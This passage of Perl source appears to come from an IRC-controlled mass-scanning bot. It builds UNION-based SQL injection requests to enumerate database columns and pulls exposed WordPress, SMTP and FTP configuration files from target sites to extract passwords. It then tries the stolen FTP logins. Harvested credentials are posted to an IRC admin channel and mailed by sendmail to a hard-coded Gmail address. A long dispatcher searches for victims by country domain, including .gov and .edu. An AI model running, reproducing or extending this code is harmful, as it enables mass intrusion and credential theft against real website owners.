  4363.                     &msg("$chan","$sqllogo 15,1 $engine 15(4@9SQL15) (4@9Tabel15) 14 $sql ");
  4364.  
  4365.                     &tabelka($situs,$tabla,$chan,$engine,$nick);
  4366.  
  4367.                     }
  4368.  
  4369.                 }
  4370.  
  4371.         }
  4372.  
  4373.     }          
  4374.  
  4375. }
  4376.  
  4377.  
  4378.  
  4379. sub tabelka() {
  4380.  
  4381.             my $situs =$_[0];
  4382.  
  4383.             my $tabla =$_[1];
  4384.  
  4385.             my $chan  =$_[2];
  4386.  
  4387.             my $engine=$_[3];
  4388.  
  4389.             my $nick=$_[4];
  4390.  
  4391.             my $cfin.="--";
  4392.  
  4393.             my $cmn.= "+";
  4394.  
  4395.             chomp($tabla);
  4396.  
  4397.             foreach $columna(@kolumny)
  4398.  
  4399.             {
  4400.  
  4401.              chomp($columna);
  4402.  
  4403.              $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
  4404.  
  4405.              $response=get($sql)or die("[-] Impossible to get columns\n");
  4406.  
  4407.              if ($response =~ /loginpwnz/)
  4408.  
  4409.                 {
  4410.  
  4411.                 &msg("$chan","$sqllogo 15,1 $engine 15(4@9SQL15) (4@9SQLi Vuln15) 9 $situs 14(4@13Kolom14)13 $columna 14(4@9Tabel14)13 $tabla ");
  4412.  
  4413.                 }
  4414.  
  4415.             }
  4416.  
  4417.        
  4418.  
  4419. }  
  4420.  
  4421.    
  4422.  
  4423. sub char() {
  4424.  
  4425. my $str = $_[0];
  4426.  
  4427. my @strs = split(//,$str);
  4428.  
  4429. my @list;
  4430.  
  4431. foreach my $string(@strs){
  4432.  
  4433. my $hex = unpack("C*",$string);
  4434.  
  4435. $hex .= ",";
  4436.  
  4437. push (@list,$hex);
  4438.  
  4439. }
  4440.  
  4441. my $res = "CHAR(".join(" ",@list).")";
  4442.  
  4443. $res =~ s/,\)$/\)/;
  4444.  
  4445. $res =~ s/ //g;
  4446.  
  4447. return $res;
  4448.  
  4449. }
  4450.  
  4451.  
  4452.  
  4453. sub ftp_connect (){
  4454.  
  4455.     my $url = $_[0];
  4456.  
  4457.     my $host = $_[1];
  4458.  
  4459.     my $user = $_[2];
  4460.  
  4461.     my $pass = $_[3];
  4462.  
  4463.     my $chan = $_[4];
  4464.  
  4465.     my $engine = $_[5];
  4466.  
  4467.     my $logo = $_[6];
  4468.  
  4469.     my $success = 1;
  4470.  
  4471.     use Net::FTP;
  4472.  
  4473.     eval {
  4474.  
  4475.     my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 7);
  4476.  
  4477.         $success = 0 if $ftp->login($user,$pass);
  4478.  
  4479.         $ftp->quit;
  4480.  
  4481.         };
  4482.  
  4483.         if ($success == 0) {
  4484.  
  4485.         &msg("$chanx","15[4 $engine 15] 9http://".$host." |7 ".$user.":".$pass." 9| $logo");sleep(2);
  4486.  
  4487.     }
  4488.  
  4489. }
  4490.  
  4491.  
  4492.  
  4493.  
  4494.  
  4495. sub bogex() {
  4496.  
  4497.     my $url    = $_[0];
  4498.  
  4499.     my $chan   = $_[1];
  4500.  
  4501.     my $site   = $_[2];
  4502.  
  4503.     my $engine = $_[3];
  4504.  
  4505.     my $logo   = $_[4];
  4506.  
  4507.     my $data   = &get_content($url);
  4508.  
  4509.     my $psite  = "http://".$site;
  4510.  
  4511.     if ($psite =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $host = $2; }
  4512.  
  4513.     if ($data =~ m/smtphost/g && $data =~ m/smtppass/g || $data =~ m/ftp_host/g ) {
  4514.  
  4515.     if ($data =~ m/smtphost(.+?)\'(.*)\'/g) { $smtph = $2; }
  4516.  
  4517.     if ($data =~ m/smtpport(.+?)\'(.*)\'/g) { $smtpp = $2; }
  4518.  
  4519.     if ($data =~ m/smtpuser(.+?)\'(.*)\'/g) { $smtpu = $2; }
  4520.  
  4521.     if ($data =~ m/smtppass(.+?)\'(.*)\'/g) { $smtps = $2; }
  4522.  
  4523.     if ($data =~ m/ftp_host(.+?)\'(.*)\'/g) { $ftph = $2; }
  4524.  
  4525.     if ($data =~ m/ftp_port(.+?)\'(.*)\'/g) { $ftpp = $2; }
  4526.  
  4527.     if ($data =~ m/ftp_user(.+?)\'(.*)\'/g) { $ftpu = $2; }
  4528.  
  4529.     if ($data =~ m/ftp_pass(.+?)\'(.*)\'/g) { $ftps = $2; }
  4530.  
  4531.     if ($data =~ m/var \$user(.+?)\'(.*)\'/g) { $cfuser = $2; }
  4532.  
  4533.     if ($data =~ m/var \$user(.+?)\'(.*)_(.*)\'/g ) { $cfuserx = $2; }
  4534.  
  4535.     if ($data =~ m/password(.+?)\'(.*)\'/g) { $cfpass = $2; }
  4536.  
  4537.     &msg("$chanx","$ftplogo15,1[6DB15]3 $host 15,1[4 $smtph 4:4 $smtpp 4|3 $smtpu 4:3 $smtps 15][4 $ftph 4:4 $ftpp 4|3 $ftpu 4:3 $ftps 15][7 $cfuser 4:7 $cfpass 15]"); sleep(2);
  4538.  
  4539.     &bogelftp($host,$ftpu,$ftps,$chan,$engine);
  4540.  
  4541.     }
  4542.  
  4543. }
  4544.  
  4545.  
  4546.  
  4547. sub bogelftp() {
  4548.  
  4549.     my $host = $_[0];
  4550.  
  4551.     my $user = $_[1];
  4552.  
  4553.     my $pass = $_[2];
  4554.  
  4555.     my $chan = $_[3];
  4556.  
  4557.     my $engine = $_[4];
  4558.  
  4559.     my $logo = $_[5];
  4560.  
  4561.     my $success = 1;
  4562.  
  4563.     use Net::FTP;
  4564.  
  4565.     eval {
  4566.  
  4567.     my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5);
  4568.  
  4569.     $success = 0 if $ftp->login($user,$pass);
  4570.  
  4571.     $ftp->quit;
  4572.  
  4573.     };
  4574.  
  4575.     if ($success == 0) {
  4576.  
  4577.     &msg("$admin","$logo15,1[15@4FTP15][3 http://".$host." 15][3 ".$user." 4:3 ".$pass." 15] 9FUCKED");
  4578.  
  4579.     #&msg("#coi","$logo15,1[15@4$engine15][8 Status Login FTP 9OK! 15-8 Result Sent to 4*9 ADMIN 4* 15] ");
  4580.  
  4581. $mailtype = "content-type: text/html";
  4582.  
  4583. $sendmail = '/usr/sbin/sendmail';
  4584.  
  4585. $sender = "myluph\@blackunix.us";
  4586.  
  4587. $subject = "myluph - Cpanel info :";
  4588.  
  4589. $mailto = "sabuncuci88\@gmail.com";
  4590.  
  4591. open (SENDMAIL, "| $sendmail -t");
  4592.  
  4593. print SENDMAIL "$mailtype\n";
  4594.  
  4595. print SENDMAIL "Subject: $subject\n";
  4596.  
  4597. print SENDMAIL "From: $sender\n";
  4598.  
  4599. print SENDMAIL "To: $mailto\n\n";
  4600.  
  4601. print SENDMAIL "Setoran FTP or cPaneL -> Host: $host Login: $user Pass: $pass \n\n";
  4602.  
  4603. close (SENDMAIL);
  4604.  
  4605. #print "mail has been target Sent to $mailto\n";
  4606.  
  4607.     }
  4608.  
  4609. }
  4610.  
  4611.  
  4612.  
  4613. sub smtp() {
  4614.  
  4615.     my $url    = $_[0];
  4616.  
  4617.     my $chan   = $_[1];
  4618.  
  4619.     my $site   = $_[2];
  4620.  
  4621.     my $engine = $_[3];
  4622.  
  4623.     my $logo   = $_[4];
  4624.  
  4625.     my $check = &get_content($url);
  4626.  
  4627.     if ($check =~ m/\$smtpauth = '1';/i) {
  4628.  
  4629.     my $smtpauth = "";
  4630.  
  4631.     my $smtphost = "";
  4632.  
  4633.     my $smtpuser = "";
  4634.  
  4635.     my $smtppass = "";
  4636.  
  4637.     if ($check =~ m/\$smtphost = '(.+?)';/i){$smtphost=$1;}
  4638.  
  4639.     if ($check =~ m/\$smtpport = '(.+?)';/i){$smtpport=$1;}
  4640.  
  4641.     if ($check =~ m/\$smtpuser = '(.+?)';/i){$smtpuser=$1;}
  4642.  
  4643.     if ($check =~ m/\$smtppass = '(.+?)';/i){$smtppass=$1;}
  4644.  
  4645.     &msg("$admin","$logo15,1[15@4SMTP15]4 $site14 -11 $smtphost 14|11 $smtpport 14|11 $smtpuser 14|11 $smtppass ");
  4646.  
  4647.     #&msg("$chan","$logo15,1[15@4SMTP15][8 Status SMTP 9OK! 4-8 Result Sent to 4*9 ADMIN 4* 15] ");
  4648.  
  4649. $mailtype = "content-type: text/html";
  4650.  
  4651. $sendmail = '/usr/sbin/sendmail';
  4652.  
  4653. $sender = "myluph\@blackunix.us";
  4654.  
  4655. $subject = "myluph - SMTP INFO :";
  4656.  
  4657. $mailto = "sabuncuci88\@gmail.com";
  4658.  
  4659. open (SENDMAIL, "| $sendmail -t");
  4660.  
  4661. print SENDMAIL "$mailtype\n";
  4662.  
  4663. print SENDMAIL "Subject: $subject\n";
  4664.  
  4665. print SENDMAIL "From: $sender\n";
  4666.  
  4667. print SENDMAIL "To: $mailto\n\n";
  4668.  
  4669. print SENDMAIL "Setoran SMTP -> Host: $smtphost - Port: $smtpport - Login: $smtpuser - Pass: $smtppass \n\n";
  4670.  
  4671. close (SENDMAIL);
  4672.  
  4673. #print "mail has been target Sent to $mailto\n";
  4674.  
  4675.     }
  4676.  
  4677. }
  4678.  
  4679.  
  4680.  
  4681. sub bogex2() {
  4682.  
  4683.      my $url    = $_[0];
  4684.  
  4685.      my $chan   = $_[1];
  4686.  
  4687.      my $site   = $_[2];
  4688.  
  4689.      my $request   = HTTP::Request->new(GET=>$url);
  4690.  
  4691.      my $browser   = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0, SSL_version => 'TLSv1:!TLSv11:!TLSv12:!SSLv2:!SSLv3'});
  4692.  
  4693.         $browser->timeout(10);
  4694.  
  4695.         $browser->agent($uagent);
  4696.  
  4697.         my $response  = $browser->request($request);
  4698.  
  4699.         if ($response->is_success) {
  4700.  
  4701.     my $res   = $response->as_string;
  4702.  
  4703.     if ($res =~ m/'DB_HOST', '(.*)'/g) {
  4704.  
  4705.     $userpass = getpassx($res);
  4706.  
  4707.     &msg("$chan","$DBlogo15,1[15@4DB15] [7 http://".$site." 15][3 $userpass 15]");
  4708.  
  4709.     @index = ('phpmyadmin/','phpMyAdmin/');
  4710.  
  4711.     foreach $scan(@index){
  4712.  
  4713.     $urlx = "http://".$site.$scan;
  4714.  
  4715.     $request = HTTP::Request->new(GET=>$urlx);
  4716.  
  4717.     $useragent = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0, SSL_version => 'TLSv1:!TLSv11:!TLSv12:!SSLv2:!SSLv3'});
  4718.  
  4719.     $response = $useragent->request($request);
  4720.  
  4721.     if ($response->is_success && $response->content =~ /Admin Area/ || $response->content =~ /Password/ || $response->content =~ /welcome/ || $response->content =~ /passwd/ || $response->content =~ /username/) {
  4722.  
  4723.     &msg("$chan","15,1[15@4phpMyAdmin15][4 $urlx 15,1[3 $userpass 15]");
  4724.  
  4725.         } sleep(1);
  4726.  
  4727.     }
  4728.  
  4729.     my $lulz = "http://".$site;
  4730.  
  4731.     my $user = "";
  4732.  
  4733.     my $pass = "";
  4734.  
  4735.     if($lulz =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
  4736.  
  4737.     my $host = $2;
  4738.  
  4739.     my @ftpu = split(":xXx:", $userpass);
  4740.  
  4741.     $user = $ftpu[0];
  4742.  
  4743.     $pass = $ftpu[1];
  4744.  
  4745.     my $ftpstat = "";
  4746.  
  4747.     if($user =~ /_/) { @userz = split("_", $user); $user = $userz[0];}
  4748.  
  4749.     bogelftp2($res,$host,$user,$pass,$chan,$engine);
  4750.  
  4751.     } sleep(3);
  4752.  
  4753.         }
  4754.  
  4755.     }
  4756.  
  4757. }
  4758.  
  4759.  
  4760.  
  4761. sub getpassx() {
  4762.  
  4763.     my $string = $_[0];
  4764.  
  4765.     my @bogel = split("\r\n", $string);
  4766.  
  4767.     my $pass = "";
  4768.  
  4769.     my $user = "";
  4770.  
  4771.     foreach my $line (@bogel) {
  4772.  
  4773.         if(($line =~ m/'DB_PASSWORD', '(.*)'/i) or ($line =~ /<password><!\[CDATA\[(.*)\]\]\><\/password>/)) {
  4774.  
  4775.             $pass = $1;
  4776.  
  4777.         }
  4778.  
  4779.         if(($line =~ m/'DB_USER', '(.*)'/i) or ($line =~ /<username><!\[CDATA\[(.*)\]\]\><\/username>/)) {
  4780.  
  4781.             $user = $1;
  4782.  
  4783.         }
  4784.  
  4785.     }
  4786.  
  4787.     return $user." : ".$pass;
  4788.  
  4789. }
  4790.  
  4791.  
  4792.  
  4793. sub bogelftp2() {
  4794.  
  4795.     my $url = $_[0];
  4796.  
  4797.     my $host = $_[1];
  4798.  
  4799.     my $user = $_[2];
  4800.  
  4801.     my $pass = $_[3];
  4802.  
  4803.     my $chan = $_[4];
  4804.  
  4805.     my $engine = $_[5];
  4806.  
  4807.     my $logo = $_[6];
  4808.  
  4809.     my $success = 1;
  4810.  
  4811.     use Net::FTP;
  4812.  
  4813.     eval {
  4814.  
  4815.     my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 2);
  4816.  
  4817.     $success = 0 if $ftp->login($user,$pass);
  4818.  
  4819.     $ftp->quit;
  4820.  
  4821.     };
  4822.  
  4823.     if ($success == 0) {
  4824.  
  4825.     &msg("$admin","$logo15,1[15@4FTP15][3 http://".$host." 15][3 ".$user." 4:3 ".$pass." 15] 9FUCKED");
  4826.  
  4827. $mailtype = "content-type: text/html";
  4828.  
  4829. $sendmail = '/usr/sbin/sendmail';
  4830.  
  4831. $sender = "myluph\@blackunix.us";
  4832.  
  4833. $subject = "myluph - Cpanel info :";
  4834.  
  4835. $mailto = "sabuncuci88\@gmail.com";
  4836.  
  4837. open (SENDMAIL, "| $sendmail -t");
  4838.  
  4839. print SENDMAIL "$mailtype\n";
  4840.  
  4841. print SENDMAIL "Subject: $subject\n";
  4842.  
  4843. print SENDMAIL "From: $sender\n";
  4844.  
  4845. print SENDMAIL "To: $mailto\n\n";
  4846.  
  4847. print SENDMAIL "Wordpress Setoran FTP or cPaneL -> Host: $host Login: $user Pass: $pass \n\n";
  4848.  
  4849. close (SENDMAIL);
  4850.  
  4851. #print "mail has been Sent to $mailto\n";
  4852.  
  4853.     }
  4854.  
  4855. }
  4856.  
  4857.  
  4858.  
  4859. #########################################       Searching site...
  4860.  
  4861.  
  4862.  
  4863. sub search_engine() {
  4864.  
  4865.     my (@list,@clean);
  4866.  
  4867.     my $chan = $_[0];
  4868.  
  4869.     my $bug = $_[1];
  4870.  
  4871.     my $dork = $_[2];
  4872.  
  4873.     my $engine = $_[3];
  4874.  
  4875.     my $logo = $_[4];
  4876.  
  4877.     if ($engine eq "aanK") { my @aank = &jack21($dork); push(@list,@aank);sleep(3); }
  4878.  
  4879.     if ($engine eq "coi") { my @coi = &jack22($dork); push(@list,@coi);sleep(3); }
  4880.  
  4881.     if ($engine eq "roin") { my @roin = &jack23($dork); push(@list,@roin);sleep(3); }
  4882.  
  4883.     if ($engine eq "Keren") { my @keren = &jack24($dork); push(@list,@keren);sleep(3);}
  4884.  
  4885.     if ($engine eq "Beken") { my @beken = &jack25($dork); push(@list,@beken);sleep(3);}
  4886.  
  4887.     if ($engine eq "kangkung") { my @kangkung = &jack26($dork); push(@list,@kangkung);sleep(3);}
  4888.  
  4889.     if ($engine eq "successor") { my @successor = &jack27($dork); push(@list,@successor);sleep(3);}
  4890.  
  4891.     if ($engine eq "Brewok") { my @brewok = &jack28($dork); push(@list,@brewok);sleep(3);}
  4892.  
  4893.     if ($engine eq "Marlboro") { my @marlboro = &jack29($dork); push(@list,@marlboro);sleep(3);}
  4894.  
  4895.     if ($engine eq "Prince") { my @prince = &jack30($dork); push(@list,@prince);sleep(3);}
  4896.  
  4897.     if ($engine eq "Cita-Citata") { my @citacitata = jack1($dork); push(@list,@citacitata);sleep(3);}
  4898.  
  4899.     if ($engine eq "Depe") { my @depe = jack2($dork); push(@list,@depe);sleep(3);}
  4900.  
  4901.     if ($engine eq "JuPe") { my @jupe = jack3($dork); push(@list,@jupe);sleep(3);}
  4902.  
  4903.     if ($engine eq "Ayu-tingting") { my @ayutingting = jack4($dork); push(@list,@ayutingting);sleep(3);}
  4904.  
  4905.     if ($engine eq "Siti-badriah") { my @sitibadriah = jack5($dork); push(@list,@australia);sleep(3);}
  4906.  
  4907.     if ($engine eq "Zaskia-Gotik") { my @zaskiagotik = jack6($dork); push(@list,@brazil);sleep(3); }
  4908.  
  4909.     if ($engine eq "Hesty") { my @hesty = jack7($dork); push(@list,@hesty);sleep(3); }
  4910.  
  4911.     if ($engine eq "InuL-darasista") { my @inuldarasista = jack8($dork); push(@list,@inuldarasista);sleep(3); }
  4912.  
  4913.     if ($engine eq "Duo-Racun") { my @duoracun = jack9($dork); push(@list,@duoracun);sleep(3); }
  4914.  
  4915.     if ($engine eq "Juwita-Bahar") { my @juwitabahar= jack10($dork); push(@list,@juwitabahar); }
  4916.  
  4917.     if ($engine eq "Uut") { my @uut = jack11($dork); push(@list,@uut);sleep(3); }
  4918.  
  4919.     if ($engine eq "Tuty-Wibowo") { my @tutywibowo = jack12($dork); push(@list,@tutywibowo);sleep(3); }
  4920.  
  4921.     if ($engine eq "MeLa-Berby") { my @melaberby = jack13($dork); push(@list,@melaberby);sleep(3); }
  4922.  
  4923.     if ($engine eq "Ria-Amelia") { my @riaamelia = jack14($dork); push(@list,@riaamelia);sleep(3); }
  4924.  
  4925.     if ($engine eq "Melinda") { my @melinda = jack15($dork); push(@list,@melinda);sleep(3); }
  4926.  
  4927.     if ($engine eq "Dewinta-Bahar") { my @dewintabahar = jack16($dork); push(@list,@dewintabahar);sleep(3); }
  4928.  
  4929.     if ($engine eq "Lia-Emilia") { my @liaemilia = jack17($dork); push(@list,@liaemilia);sleep(3); }
  4930.  
  4931.     if ($engine eq "Ade-Irma") { my @adeirma = jack18($dork); push(@list,@adeirma);sleep(3); }
  4932.  
  4933.     if ($engine eq "Shinta-n-Jojo") { my @shintanjojo = jack19($dork); push(@list,@shintanjojo);sleep(3); }
  4934.  
  4935.     if ($engine eq "Jenita-Janet") { my @jenitajanet = jack20($dork); push(@list,@jenitajanet);sleep(3); }
  4936.  
  4937.     if ($engine eq "UAE") { my @uae = jack1($dork); push(@list,@uae);sleep(3); }
  4938.  
  4939.     if ($engine eq "Myanmar") { my @myanmar = jack2($dork); push(@list,@myanmar);sleep(3); }
  4940.  
  4941.     if ($engine eq "Argentina") { my @argentina = jack3($dork); push(@list,@argentina);sleep(3); }
  4942.  
  4943.     if ($engine eq "Austria") { my @austria = jack4($dork); push(@list,@austria);sleep(3); }
  4944.  
  4945.     if ($engine eq "Australia") { my @australia = jack5($dork); push(@list,@australia);sleep(3); }
  4946.  
  4947.     if ($engine eq "Brazil") { my @brazil = jack6($dork); push(@list,@brazil);sleep(3); }
  4948.  
  4949.     if ($engine eq "Canada") { my @canada = jack7($dork); push(@list,@canada);sleep(3); }
  4950.  
  4951.     if ($engine eq "Chili") { my @chili = jack8($dork); push(@list,@chili);sleep(3); }
  4952.  
  4953.     if ($engine eq "Cina") { my @cina = jack9($dork); push(@list,@cina);sleep(3); }
  4954.  
  4955.     if ($engine eq "CoMersil") { my @comersil = jack10($dork); push(@list,@comersil);sleep(3); }
  4956.  
  4957.     if ($engine eq "Czech") { my @czech = jack11($dork); push(@list,@czech);sleep(3); }
  4958.  
  4959.     if ($engine eq "Germany") { my @germany = jack12($dork); push(@list,@germany);sleep(3); }
  4960.  
  4961.     if ($engine eq "Denmark") { my @denmark = jack13($dork); push(@list,@denmark);sleep(3); }
  4962.  
  4963.     if ($engine eq "Spain") { my @spain = jack14($dork); push(@list,@spain);sleep(3);sleep(3); }
  4964.  
  4965.     if ($engine eq "Europe") { my @europe = jack15($dork); push(@list,@europe);sleep(3); }
  4966.  
  4967.     if ($engine eq "France") { my @france = jack16($dork); push(@list,@france);sleep(3); }
  4968.  
  4969.     if ($engine eq "Hungary") { my @hungary = jack17($dork); push(@list,@hungary);sleep(3);sleep(3); }
  4970.  
  4971.     if ($engine eq "Indonesia") { my @indonesia = jack18($dork); push(@list,@indonesia);sleep(3); }
  4972.  
  4973.     if ($engine eq "Israel") { my @israel = jack19($dork); push(@list,@israel);sleep(3); }
  4974.  
  4975.     if ($engine eq "India") { my @india = jack20($dork); push(@list,@india);sleep(3); }
  4976.  
  4977.     if ($engine eq "Info") { my @info = jack1($dork); push(@list,@info);sleep(3); }
  4978.  
  4979.     if ($engine eq "Iran") { my @iran = jack2($dork); push(@list,@iran);sleep(3); }
  4980.  
  4981.     if ($engine eq "Italy") { my @italy = jack3($dork); push(@list,@italy);sleep(3); }
  4982.  
  4983.     if ($engine eq "Japan") { my @japan = jack4($dork); push(@list,@japan);sleep(3); }
  4984.  
  4985.     if ($engine eq "Korea") { my @korea = jack5($dork); push(@list,@korea);sleep(3); }
  4986.  
  4987.     if ($engine eq "Mexico") { my @mexico = jack6($dork); push(@list,@mexico);sleep(3); }
  4988.  
  4989.     if ($engine eq "Malaysia") { my @malaysia = jack7($dork); push(@list,@malaysia);sleep(3); }
  4990.  
  4991.     if ($engine eq "Network") { my @network = jack8($dork); push(@list,@network);sleep(3); }
  4992.  
  4993.     if ($engine eq "Netherlands") { my @netherlands = jack9($dork); push(@list,@netherlands); }
  4994.  
  4995.     if ($engine eq "Organization") { my @organization = jack10($dork); push(@list,@organization);sleep(3); }
  4996.  
  4997.     if ($engine eq "Philippines") { my @philippines = jack11($dork); push(@list,@philippines);sleep(3); }
  4998.  
  4999.     if ($engine eq "Poland") { my @poland = jack12($dork); push(@list,@poland);sleep(3); }
  5000.  
  5001.     if ($engine eq "Romania") { my @romania = jack13($dork); push(@list,@romania);sleep(3); }
  5002.  
  5003.     if ($engine eq "Russian") { my @russian = jack14($dork); push(@list,@russian);sleep(3); }
  5004.  
  5005.     if ($engine eq "Thailand") { my @thailand = jack14($dork); push(@list,@thailand);sleep(3); }
  5006.  
  5007.     if ($engine eq "Ukraine") { my @ukraine = jack16($dork); push(@list,@ukraine);sleep(3); }
  5008.  
  5009.     if ($engine eq "England") { my @england = jack17($dork); push(@list,@england);sleep(3); }
  5010.  
  5011.     if ($engine eq "USA") { my @usa = jack18($dork); push(@list,@usa);sleep(3); }
  5012.  
  5013.     if ($engine eq "Slovenia") { my @slovenia = jack19($dork."+site:si"); push(@list,@slovenia);sleep(3); }
  5014.  
  5015.     if ($engine eq "Belgium") { my @belgium = jack20($dork."+site:be"); push(@list,@belgium);sleep(3); }
  5016.  
  5017.     if ($engine eq "Bussines") { my @bussines = jack1($dork."+site:bi"); push(@list,@bussines);sleep(3); }            
  5018.  
  5019.     if ($engine eq "SouthAfrica") { my @southafrica = jack2($dork."+site:co.za"); push(@list,@southafrica); }
  5020.  
  5021.     if ($engine eq "Vietnam") { my @vietnam = jack3($dork."+site:com.vn"); push(@list,@vietnam);sleep(3); }
  5022.  
  5023.     if ($engine eq "Tuvalu") { my @tuvalu = jack4($dork."+site:tt"); push(@list,@tuvalu);sleep(3); }
  5024.  
  5025.     if ($engine eq "Cocos") { my @cocos = jack5($dork."+site:cc"); push(@list,@cocos);sleep(3); }
  5026.  
  5027.     if ($engine eq "Turky") { my @turky = jack6($dork."+site:tr"); push(@list,@turky);sleep(3); }
  5028.  
  5029.     if ($engine eq "Asia") { my @asia = jack7($dork."+site:asia"); push(@list,@asia);sleep(3); }
  5030.  
  5031.     if ($engine eq "Serbia") { my @serbia = jack8($dork."+site:rs"); push(@list,@serbia);sleep(3); }
  5032.  
  5033.     if ($engine eq "Singapore") { my @singapore = jack9($dork."+site:sg"); push(@list,@singapore);sleep(3); }
  5034.  
  5035.     if ($engine eq "Taiwan") { my @taiwan = jack10($dork."+site:tw"); push(@list,@taiwan);sleep(3);}
  5036.  
  5037.     if ($engine eq "Sweden") { my @sweden = jack11($dork."+site:se"); push(@list,@sweden);sleep(3); }
  5038.  
  5039.     if ($engine eq "Pakistan") { my @pakistan = jack12($dork."+site:pk"); push(@list,@pakistan);sleep(3); }
  5040.  
  5041.     if ($engine eq "Norway") { my @normay = jack13($dork."+site:no"); push(@list,@norway);sleep(3); }
  5042.  
  5043.     if ($engine eq "Montenegro") { my @montenegro = jack14($dork."+site:me"); push(@list,@montenegro);sleep(3); }      
  5044.  
  5045.     if ($engine eq "Greece") { my @greece = jack15($dork."+site:gr"); push(@list,@greece);sleep(3);sleep(3);}
  5046.  
  5047.     if ($engine eq "Education") { my @education = jack16($dork."+site:edu"); push(@list,@education);sleep(3);}
  5048.  
  5049.     if ($engine eq "Goverment") { my @goverment = jack17($dork."+site:gov"); push(@list,@goverment);sleep(3); }
  5050.  
  5051.     if ($engine eq "Kazakhstan") { my @kazakhstan = jack18($dork."+site:kz"); push(@list,@kazakhstan);sleep(3); }
  5052.  
  5053.     if ($engine eq "Afganistan") { my @afganistan = jack19($dork."+site:af"); push(@list,@afganistan);sleep(3); }
  5054.  
  5055.     if ($engine eq "Albania") { my @albania = jack20($dork."+site:al"); push(@list,@albania);sleep(3); }
  5056.  
  5057.     if ($engine eq "Algeria") { my @algeria = jack1($dork."+site:dz"); push(@list,@algeria);sleep(3); }
  5058.  
  5059.     if ($engine eq "Angola") { my @angola = jack2($dork."+site:ao"); push(@list,@angola);sleep(3); }
  5060.  
  5061.     if ($engine eq "Armenia") { my @armenia = jack3($dork."+site:am"); push(@list,@armenia);sleep(3); }
  5062.  
  5063.     if ($engine eq "Azerbaijan") { my @azerbaijan = jack4($dork."+site:az"); push(@list,@azerbaijan);sleep(3); }
  5064.  
  5065.     if ($engine eq "Bahrain") { my @bahrain = jack5($dork."+site:bh"); push(@list,@bahrain);sleep(3); }
  5066.  
  5067.     if ($engine eq "Bangladesh") { my @bangladesh = jack6($dork."+site:bd"); push(@list,@bangladesh);sleep(3); }
  5068.  
  5069.     if ($engine eq "Belarus") { my @belarus = jack7($dork."+site:by"); push(@list,@belarus);sleep(3); }
  5070.  
  5071.     if ($engine eq "Bhutan") { my @bhutan = jack8($dork."+site:bt"); push(@list,@bhutan);sleep(3); }
  5072.  
  5073.     if ($engine eq "Bolivia") { my @bolivia = jack9($dork."+site:bo"); push(@list,@bolivia);sleep(3); }
  5074.  
  5075.     if ($engine eq "Bosnia") { my @bosnia = jack10($dork."+site:ba"); push(@list,@bosnia);sleep(3); }
  5076.  
  5077.     if ($engine eq "Bulgaria") { my @bulgaria = jack12($dork."+site:bg"); push(@list,@bulgaria);sleep(3); }
  5078.  
  5079.     if ($engine eq "Brunei") { my @brunei = jack13($dork."+site:bn"); push(@list,@brunei);sleep(3); }
  5080.  
  5081.     if ($engine eq "Cambodia") { my @cambodia = jack14($dork."+site:kh"); push(@list,@cambodia);sleep(3); }
  5082.  
  5083.     if ($engine eq "Cameroon") { my @cameroon = jack11($dork."+site:cm"); push(@list,@cameroon);sleep(3); }
  5084.  
  5085.     if ($engine eq "Christmas") { my @christmas = jack15($dork."+site:cx"); push(@list,@christmas);sleep(3); }
  5086.  
  5087.     if ($engine eq "CostaRika") { my @costarika = jack16($dork."+site:cr"); push(@list,@costarika);sleep(3); }
  5088.  
  5089.     if ($engine eq "Croatia") { my @croatia = jack17($dork."+site:hr"); push(@list,@croatia);sleep(3); }
  5090.  
  5091.     if ($engine eq "Cuba") { my @cuba = jack18($dork."+site:cu"); push(@list,@cuba);sleep(3); }
  5092.  
  5093.     if ($engine eq "Cyprus") { my @cyprus = jack19($dork."+site:cy"); push(@list,@cyprus);sleep(3); }
  5094.  
  5095.     if ($engine eq "Dominican") { my @dominican = jack20($dork."+site:dm"); push(@list,@dominican);sleep(3); }
  5096.  
  5097.     if ($engine eq "Equador") { my @equador = jack1($dork."+site:ec"); push(@list,@equador);sleep(3); }
  5098.  
  5099.     if ($engine eq "Egypt") { my @egypt = jack2($dork."+site:eg"); push(@list,@egypt);sleep(3); }
  5100.  
  5101.     if ($engine eq "Estonia") { my @estonia = jack3($dork."+site:ee"); push(@list,@estonia);sleep(3); }
  5102.  
  5103.     if ($engine eq "Finland") { my @finland = jack4($dork."+site:fi"); push(@list,@finland);sleep(3); }
  5104.  
  5105.     if ($engine eq "Georgia") { my @georgia = jack5($dork."+site:ge"); push(@list,@georgia);sleep(3); }
  5106.  
  5107.     if ($engine eq "Ghana") { my @ghana = jack6($dork."+site:gh"); push(@list,@ghana);sleep(3); }
  5108.  
  5109.     if ($engine eq "Grenada") { my @grenada = jack7($dork."+site:gd"); push(@list,@grenada);sleep(3); }
  5110.  
  5111.     if ($engine eq "Honduras") { my @honduras = jack8($dork."+site:hn"); push(@list,@honduras);sleep(3); }
  5112.  
  5113.     if ($engine eq "Hongkong") { my @hongkong = jack9($dork."+site:hk"); push(@list,@hongkong);sleep(3); }
  5114.  
  5115.     if ($engine eq "Iceland") { my @iceland = jack10($dork."+site:is"); push(@list,@iceland);sleep(3); }
  5116.  
  5117.     if ($engine eq "Ireland") { my @ireland = jack12($dork."+site:ie"); push(@list,@ireland);sleep(3); }
  5118.  
  5119.     if ($engine eq "Kenya") { my @kenya = jack13($dork."+site:ke"); push(@list,@kenya);sleep(3); }
  5120.  
  5121.     if ($engine eq "Kuwait") { my @kuwait = jack14($dork."+site:kw"); push(@list,@kuwait);sleep(3); }
  5122.  
  5123.     if ($engine eq "Laos") { my @laos = jack16($dork."+site:la"); push(@list,@laos);sleep(3); }
  5124.  
  5125.     if ($engine eq "Latvia") { my @latvia = jack17($dork."+site:lv"); push(@list,@latvia);sleep(3); }
  5126.  
  5127.     if ($engine eq "Liberia") { my @liberia = jack18($dork."+site:lr"); push(@list,@liberia);sleep(3); }
  5128.  
  5129.     if ($engine eq "Libyan") { my @libyan = jack19($dork."+site:ly"); push(@list,@libyan);sleep(3); }
  5130.  
